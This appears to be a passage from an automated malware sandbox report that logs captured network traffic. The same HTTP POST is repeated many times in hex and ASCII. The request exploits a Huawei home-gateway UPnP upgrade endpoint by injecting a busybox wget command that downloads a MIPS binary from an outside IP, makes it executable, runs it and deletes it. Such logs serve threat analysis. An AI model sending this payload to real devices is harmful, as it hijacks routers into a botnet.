20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 